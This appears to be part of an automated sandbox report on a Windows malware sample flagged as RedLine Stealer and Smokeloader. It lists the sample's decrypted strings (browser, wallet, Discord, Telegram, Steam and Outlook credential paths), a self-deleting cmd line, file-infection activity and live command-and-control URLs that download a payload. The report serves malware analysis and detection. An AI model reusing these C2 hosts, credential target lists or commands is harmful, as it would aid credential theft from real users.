                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Opera GX Stable
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: CURRENT
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: chrome-extension_
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: _0.indexeddb.leveldb
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Local State
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: profiles.ini
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: chrome
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: opera
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: firefox
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: wallets
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %08lX%04lX%lu
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ProductName
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: x32
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: x64
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %d/%d/%d %d:%d:%d
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ProcessorNameString
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DisplayName
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DisplayVersion
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Network Info:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - IP: IP?
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Country: ISO?
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: System Summary:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - HWID:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - OS:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Architecture:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - UserName:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Computer Name:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Local Time:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - UTC:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Language:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Keyboards:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Laptop:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Running Path:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - CPU:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Threads:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Cores:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - RAM:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - Display Resolution:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: - GPU:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: User Agents:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Installed Apps:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: All Users:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Current User:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Process List:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: system_info.txt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: freebl3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: mozglue.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: msvcp140.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: nss3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: softokn3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: vcruntime140.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Temp\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: .exe
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: runas
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: open
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: /c start
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %DESKTOP%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %APPDATA%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %LOCALAPPDATA%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %USERPROFILE%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %DOCUMENTS%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %PROGRAMFILES%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %PROGRAMFILES_86%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: %RECENT%
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: *.lnk
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: files
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \discord\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Local Storage\leveldb\CURRENT
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Local Storage\leveldb
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Telegram Desktop\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: key_datas
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: D877F783D5D3EF8C*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: map*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: A7FDF864FBC10B77*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: A92DAA6EA6F891F2*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: F8806DD0C461824F*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Telegram
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Tox
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: *.tox
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: *.ini
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Password
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: 00000001
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: 00000002
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: 00000003
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: 00000004
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Outlook\accounts.txt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Pidgin
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \.purple\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: accounts.xml
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: dQw4w9WgXcQ
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: token:
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Software\Valve\Steam
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: SteamPath
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \config\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ssfn*
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: config.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DialogConfig.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: DialogConfigOverlay*.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: libraryfolders.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: loginusers.vdf
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Steam\
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: sqlite3.dll
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: browsers
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: done
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: soft
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: \Discord\tokens.txt
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: /c timeout /t 5 & del /f /q "
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: " & del "C:\ProgramData\*.dll"" & exit
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: C:\Windows\system32\cmd.exe
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: https
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Content-Type: multipart/form-data; boundary=----
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: POST
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: HTTP/1.1
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: Content-Disposition: form-data; name="
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: hwid
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: build
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: token
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: file_name
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: file
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: message
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
                  Source: 0.3.7Y18r(193).exe.2430000.0.raw.unpackString decryptor: screenshot.jpg
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00408670 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_00408670
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_004061B0 CryptStringToBinaryA,CryptStringToBinaryA,0_2_004061B0
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_008988D7 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_008988D7
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_00896417 CryptStringToBinaryA,CryptStringToBinaryA,0_2_00896417

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\Desktop\7Y18r(193).exeUnpacked PE file: 0.2.7Y18r(193).exe.400000.0.unpack
                  Source: 7Y18r(193).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: C:\Users\user\Desktop\7Y18r(193).exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

                  Spreading

                  barindex
                  Infects executable files (exe, dll, sys, html)
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_007029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,2_2_007029E2
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_00702B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,2_2_00702B8C
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

                  Networking

                  barindex
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: http://bernardofata.icu/40d570f44e84a454.php
                  Uses known network protocols on non-standard ports
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
                  Source: global trafficTCP traffic: 192.168.2.8:49705 -> 44.221.84.105:799
                  Source: Joe Sandbox ViewIP Address: 44.221.84.105 44.221.84.105
                  Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_00701099 wsprintfA,WinExec,lstrlen,wsprintfA,wsprintfA,URLDownloadToFileA,lstrlen,Sleep,2_2_00701099
                  Source: global trafficHTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: ddos.dnsnb8.net
                  Source: WuiXLS.exe, 00000002.00000003.1394029719.00000000001F0000.00000004.00001000.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505812260.0000000000703000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
                  Source: WuiXLS.exe, 00000002.00000002.1505404095.0000000000611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net/
                  Source: WuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505404095.000000000059E000.00000004.00000020.00020000.00000000.sdmp, WuiXLS.exe, 00000002.00000002.1505404095.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
                  Source: WuiXLS.exe, 00000002.00000002.1505404095.000000000059E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarH
                  Source: WuiXLS.exe, 00000002.00000002.1505404095.00000000005E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarn.=
                  Source: WuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarp
                  Source: WuiXLS.exe, 00000002.00000002.1505943668.000000000231A000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarq
                  Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.com
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.activestate.comHolger
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.com
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.baanboard.comBrendon
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.com
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.develop.comDeepak
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.lua.org
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.com
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.rftp.comJosiah
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.scintilla.org/scite.rng
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.com
                  Source: SciTE.exe.2.drString found in binary or memory: http://www.spaceblue.comMathias
                  Source: WuiXLS.exe, 00000002.00000002.1505404095.0000000000611000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                  Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
                  Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
                  Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_28c6fd72-a

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 0.2.7Y18r(193).exe.890e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  PE file contains section with special chars
                  Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
                  PE file has a writeable .text section
                  Source: WuiXLS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_008A80290_2_008A8029
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_007060762_2_00706076
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_00706D002_2_00706D00
                  Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\WuiXLS.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: String function: 00403810 appears 343 times
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1488
                  Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
                  Source: 7Y18r(193).exe, 00000000.00000002.1511315758.00000000007B7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameBuskobasek.exe: vs 7Y18r(193).exe
                  Source: 7Y18r(193).exeBinary or memory string: OriginalFilenameBuskobasek.exe: vs 7Y18r(193).exe
                  Source: 7Y18r(193).exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.7Y18r(193).exe.890e67.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.1511542856.0000000000890000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.1511687586.00000000008E2000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: WuiXLS.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WuiXLS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: WuiXLS.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@5/13@4/1
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeCode function: 2_2_0070119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_0070119F
                  Source: C:\Users\user\Desktop\7Y18r(193).exeCode function: 0_2_008E5D77 CreateToolhelp32Snapshot,Module32First,0_2_008E5D77
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7472
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7496
                  Source: C:\Users\user\Desktop\7Y18r(193).exeFile created: C:\Users\user\AppData\Local\Temp\WuiXLS.exeJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(193).exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 7Y18r(193).exeReversingLabs: Detection: 95%
                  Source: 7Y18r(193).exeVirustotal: Detection: 93%
                  Source: unknownProcess created: C:\Users\user\Desktop\7Y18r(193).exe "C:\Users\user\Desktop\7Y18r(193).exe"
                  Source: C:\Users\user\Desktop\7Y18r(193).exeProcess created: C:\Users\user\AppData\Local\Temp\WuiXLS.exe C:\Users\user\AppData\Local\Temp\WuiXLS.exe
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7496 -s 1488
                  Source: C:\Users\user\Desktop\7Y18r(193).exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7472 -s 528
                  Source: C:\Users\user\Desktop\7Y18r(193).exeProcess created: C:\Users\user\AppData\Local\Temp\WuiXLS.exe C:\Users\user\AppData\Local\Temp\WuiXLS.exeJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(193).exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(193).exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(193).exeSection loaded: msimg32.dllJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(193).exeSection loaded: msvcr100.dllJump to behavior
                  Source: C:\Users\user\Desktop\7Y18r(193).exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\WuiXLS.exeSection loaded: iphlpapi.dllJump to behavior
